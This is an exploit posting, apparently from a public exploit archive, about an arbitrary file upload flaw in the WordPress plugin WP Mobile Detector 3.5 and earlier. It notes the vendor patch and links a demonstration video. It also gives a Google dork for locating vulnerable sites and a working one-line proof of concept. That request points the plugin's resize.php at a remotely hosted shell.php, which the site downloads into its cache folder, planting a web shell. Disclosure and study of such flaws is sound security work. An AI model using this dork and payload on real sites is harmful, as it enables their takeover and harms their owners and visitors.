#Exploit Title: WP Mobile Detector <=3.5 Arbitrary File upload#Google Dork: inurl: /wp-includes/plugins/wp-mobile-detector#Date: 1-06-2015#Exploit Author: Aaditya Purani#Author Details: https://aadityapurani.com#Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog#Version: 3.5#Tested on: Kali Linux 2.0 Sana / Windows 10
This Vulnerable has been disclosed to public yesterday about WP Mobile
Detector Arbitrary File upload for version <=3.5in which attacker can
upload malicious PHP Files (Shell) into the Website. Over 10,000 users are
affected, Vendor has released a Patch in their version 3.6&3.7 at
https://wordpress.org/plugins/wp-mobile-detector/changelog/.
I have wrote a Complete POC post:
WP Mobile Detector Vulnerability <=3.5 Exploit POC
I have made a POC Video Here:
https://www.youtube.com/watch?v=ULE1AVWfHTU
Simple POC:
Go to:[wordpress sitempath].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]and it will get saved in directory:/wp-content/plugins/wp-mobile-detector/cache/shell.php
